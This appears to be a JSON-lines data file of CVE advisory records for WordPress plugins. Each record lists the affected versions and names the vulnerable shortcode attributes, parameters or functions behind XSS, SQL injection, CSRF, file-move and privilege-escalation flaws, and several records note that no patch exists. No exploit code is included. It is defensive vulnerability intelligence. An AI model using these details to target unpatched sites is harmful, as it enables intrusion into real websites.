{"CVE_ID":"CVE-2024-8919","slug":"confetti-fall-animation","versionImpact":"1.3.0","description":"The Confetti Fall Animation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'confetti-fall-animation' shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b80fc93-212e-481d-907c-275139782e77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b80fc93-212e-481d-907c-275139782e77?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/confetti-fall-animation\\\/trunk\\\/confetti-fall-animation.php#L242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/confetti-fall-animation\\\/trunk\\\/confetti-fall-animation.php#L242\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6479","slug":"sip-reviews-shortcode-woocommerce","versionImpact":"1.2.3","description":"The SIP Reviews Shortcode for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'no_of_reviews' attribute in the woocommerce_reviews shortcode in all versions up to, and including, 1.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a920a77a-681a-4309-bce2-1f77c11c8b29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a920a77a-681a-4309-bce2-1f77c11c8b29?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php#L331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php#L331\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7360","slug":"ht-contactform","versionImpact":"2.2.1","description":"The HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. plugin for WordPress is vulnerable to arbitrary file moving due to insufficient file path validation in the handle_files_upload() function in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3326887\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Api\\\/Endpoints\\\/Submission.php?contextall=1&old=3316109&old_path=%2Fht-contactform%2Ftrunk%2Fadmin%2FIncludes%2FApi%2FEndpoints%2FSubmission.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3326887\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Api\\\/Endpoints\\\/Submission.php?contextall=1&old=3316109&old_path=%2Fht-contactform%2Ftrunk%2Fadmin%2FIncludes%2FApi%2FEndpoints%2FSubmission.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ht-contactform\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ht-contactform\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd42c83c-c51c-45a5-8ad5-0df2c0cc411d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd42c83c-c51c-45a5-8ad5-0df2c0cc411d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8293","slug":"intl-datetime-calendar","versionImpact":"1.0.1","description":"The Intl DateTime Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018date\u2019 parameter in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/intl-datetime-calendar\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/intl-datetime-calendar\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc333949-de1e-493a-badd-3be1c9060503?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc333949-de1e-493a-badd-3be1c9060503?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0381","slug":"gigpress","versionImpact":"2.3.28","description":"The GigPress WordPress plugin through 2.3.28 does not validate and escape some of its shortcode attributes before using them in SQL statement\/s, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39c964fa-6d8d-404d-ac38-72f6f88d203c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39c964fa-6d8d-404d-ac38-72f6f88d203c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4393","slug":"ecommerce-product-catalog","versionImpact":"3.0.17","description":"The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.0.17. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to save manual digital orders via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12ecf3d5-1457-405a-8856-517c7d2f2db1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12ecf3d5-1457-405a-8856-517c7d2f2db1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473569\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/cart\\\/includes\\\/orders\\\/includes\\\/register-digital-orders.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473569\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/cart\\\/includes\\\/orders\\\/includes\\\/register-digital-orders.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25453","slug":"wptables","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Ian Sadovy WordPress Tables plugin <=\u00a01.3.9 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wptables\\\/wordpress-wordpress-tables-plugin-1-3-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wptables\\\/wordpress-wordpress-tables-plugin-1-3-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4479","slug":"jeg-elementor-kit","versionImpact":"2.6.5","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sg_general_toggle_tab_enable and sg_accordion_style attributes within the plugin's JKit - Tabs and JKit - Accordion widget, respectively, in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6048ba9-671f-4729-9618-d7a0556a31e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6048ba9-671f-4729-9618-d7a0556a31e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.5\\\/class\\\/elements\\\/views\\\/class-tabs-view.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.5\\\/class\\\/elements\\\/views\\\/class-tabs-view.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.5\\\/class\\\/elements\\\/views\\\/class-view-abstract.php#L195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.5\\\/class\\\/elements\\\/views\\\/class-view-abstract.php#L195\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.5\\\/class\\\/elements\\\/views\\\/class-accordion-view.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.5\\\/class\\\/elements\\\/views\\\/class-accordion-view.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jeg-elementor-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jeg-elementor-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102228\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102228\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6547","slug":"add-admin-css","versionImpact":"2.0.1","description":"The Add Admin CSS plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.0.1.  This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0064244b-72a4-486d-aaad-be1f57e4a8a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0064244b-72a4-486d-aaad-be1f57e4a8a1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-admin-css\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-admin-css\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8197","slug":"visual-sound","versionImpact":"1.03","description":"The Visual Sound plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.03. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48d6d4c1-cc87-4c2c-9fbb-90af62f576aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48d6d4c1-cc87-4c2c-9fbb-90af62f576aa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88cacd47-d900-478c-b833-c6c55fd4b082\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88cacd47-d900-478c-b833-c6c55fd4b082\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8917","slug":"football-leagues-by-anwppro","versionImpact":"0.16.7","description":"The AnWP Football Leagues plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.16.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29a160ea-5582-4028-8621-7988e3a8cabf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29a160ea-5582-4028-8621-7988e3a8cabf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/class-anwp-football-leagues.php#L675\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/class-anwp-football-leagues.php#L675\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/football-leagues-by-anwppro\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/football-leagues-by-anwppro\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153845\\\/football-leagues-by-anwppro\\\/trunk\\\/class-anwp-football-leagues.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153845\\\/football-leagues-by-anwppro\\\/trunk\\\/class-anwp-football-leagues.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153845\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153845\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9446","slug":"wp-simple-anchors-links","versionImpact":"1.0.0","description":"The WP Simple Anchors Links plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpanchor shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d851ad1f-be74-49eb-9c0d-c1b309581209?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d851ad1f-be74-49eb-9c0d-c1b309581209?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-anchors-links\\\/trunk\\\/wpsimpleanchorslinks_class.php#L221\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-anchors-links\\\/trunk\\\/wpsimpleanchorslinks_class.php#L221\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-simple-anchors-links\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-simple-anchors-links\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9442","slug":"element-ready-lite","versionImpact":"1.9.0","description":"The F4 Improvements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/element-ready-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/element-ready-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b97a555a-1eeb-4fc4-9338-bad8b9a0585d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b97a555a-1eeb-4fc4-9338-bad8b9a0585d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11748","slug":"taeggie-feed","versionImpact":"0.1.9","description":"The Taeggie Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'taeggie-feed' shortcode in all versions up to, and including, 0.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taeggie-feed\\\/trunk\\\/taeggie_feed.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taeggie-feed\\\/trunk\\\/taeggie_feed.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207857%40taeggie-feed&new=3207857%40taeggie-feed&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207857%40taeggie-feed&new=3207857%40taeggie-feed&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taeggie-feed\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taeggie-feed\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65d11459-5cad-4d8b-a81d-7f0dd4342a52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65d11459-5cad-4d8b-a81d-7f0dd4342a52?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8857","slug":"wp-auctions","versionImpact":"3.7","description":"The WordPress Auction Plugin WordPress plugin through 3.7 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08ca6daa-09f4-4604-ac9e-15a1b33d599d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08ca6daa-09f4-4604-ac9e-15a1b33d599d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3180","slug":"wpgateway","versionImpact":"3.5","description":"The WPGateway Plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 3.5. This allows unauthenticated attackers to create arbitrary malicious administrator accounts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2022\\\/09\\\/psa-zero-day-vulnerability-in-wpgateway-actively-exploited-in-the-wild\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2022\\\/09\\\/psa-zero-day-vulnerability-in-wpgateway-actively-exploited-in-the-wild\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/wpgateway\\\/wpgateway-35-unauthenticated-privilege-escalation\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/wpgateway\\\/wpgateway-35-unauthenticated-privilege-escalation\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0957","slug":"smtp-amazon-ses","versionImpact":"1.7.1","description":"The SMTP for Amazon SES \u2013 YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234351\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234351\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-amazon-ses\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-amazon-ses\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6424fc9-f118-4654-89a7-1f7e6efa2c02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6424fc9-f118-4654-89a7-1f7e6efa2c02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0629","slug":"coronavirus-covid-19-notice-message","versionImpact":"1.1.2","description":"The Coronavirus (COVID-19) Notice Message WordPress plugin through 1.1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39c36d6d-5522-422b-b890-524e27e67f7c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39c36d6d-5522-422b-b890-524e27e67f7c\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39c36d6d-5522-422b-b890-524e27e67f7c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39c36d6d-5522-422b-b890-524e27e67f7c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7686","slug":"weichuncai","versionImpact":"1.5","description":"The weichuncai(WP???) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the sm-options.php page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weichuncai\\\/trunk\\\/sm-options.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weichuncai\\\/trunk\\\/sm-options.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe46ec14-4795-4ac7-afd0-de92ccef877d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe46ec14-4795-4ac7-afd0-de92ccef877d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4349","slug":"process-steps-template-designer","versionImpact":"1.2.1","description":"The Process Steps Template Designer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to conduct unspecified attacks via forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473649\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473649\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2acd40d5-8a9c-4ca8-9c89-5bf639b1c66c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2acd40d5-8a9c-4ca8-9c89-5bf639b1c66c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
